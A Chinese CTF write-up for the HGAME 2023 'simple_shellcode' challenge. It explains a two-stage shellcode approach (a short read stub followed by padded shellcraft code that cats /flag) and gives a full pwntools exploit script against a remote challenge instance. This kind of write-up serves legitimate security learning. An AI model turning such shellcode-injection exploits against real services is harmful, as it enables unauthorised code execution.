简单ORW初探

Problem: [HGAME 2023 week1]simple_shellcode

思路

题目提示重读。gdb 动调发现 rdi 有值，需要清空；rdx 是 0xcafe0000，直接转移到 rsi。
rdx 也是读取的字节数，这里设置这么大无伤大雅，懒得改，直接 syscall。
然后根据之前的 payload 大小生成垃圾字符，后面跟 shellcode，这样执行完刚好到我们的 shellcode，
直接输出 flag。

EXP

  from pwn import *
from LibcSearcher import *
#from LibcSearcher import *
# Verbose pwntools logging, and amd64 as the target for asm()/shellcraft.
context.log_level = 'debug'
context.arch = 'amd64'
# Challenge binary and the libc shipped with it; neither is referenced again
# in this script, they are only loaded for convenience.
e = ELF('./vuln')
libc = ELF('./libc-2.31.so')
# Remote challenge instance; swap in process("./vuln") to debug locally.
io = remote("node5.anna.nssctf.cn", 24834)
#io = process("./vuln")

def get_addr():
    """Read from io up to the next 0x7f byte and unpack the last 6 bytes as a
    little-endian u64 (zero-padded to 8 bytes). Unused in this script."""
    leaked = io.recvuntil(b'\x7f')
    low_six = leaked[-6:]
    return u64(low_six.ljust(8, b'\x00'))

def bug():
    """Attach the debugger to the current io target (pwntools attach)."""
    target = io
    attach(target)

# Short aliases around the io connection and the pwntools unpackers; each one
# forwards straight to the underlying call and returns its result.
def s(data):
    return io.send(data)


def sa(delim, data):
    return io.sendafter(delim, data)


def sl(data):
    return io.sendline(data)


def sla(delim, data):
    return io.sendlineafter(delim, data)


def r(num):
    return io.recv(num)


def ru(delims, drop=True):
    return io.recvuntil(delims, drop)


def itr():
    return io.interactive()


def uu32(data):
    # Pad to 4 bytes so partial leaks unpack cleanly.
    return u32(data.ljust(4, b'\x00'))


def uu64(data):
    # Pad to 8 bytes so partial leaks unpack cleanly.
    return u64(data.ljust(8, b'\x00'))


def ls(data):
    return log.success(data)


code = """
xor rdi,rdi
mov rsi,rdx
syscall

"""
payload = asm(code) 
ls("shellcode byte=>"+str(len(payload)))
#bug()
sa(b"shellcode",payload)
payload1 = b'a'*len(payload) + asm(shellcraft.cat('/flag'))
s(payload1)


io.interactive()

总结

  • 对该题的考点总结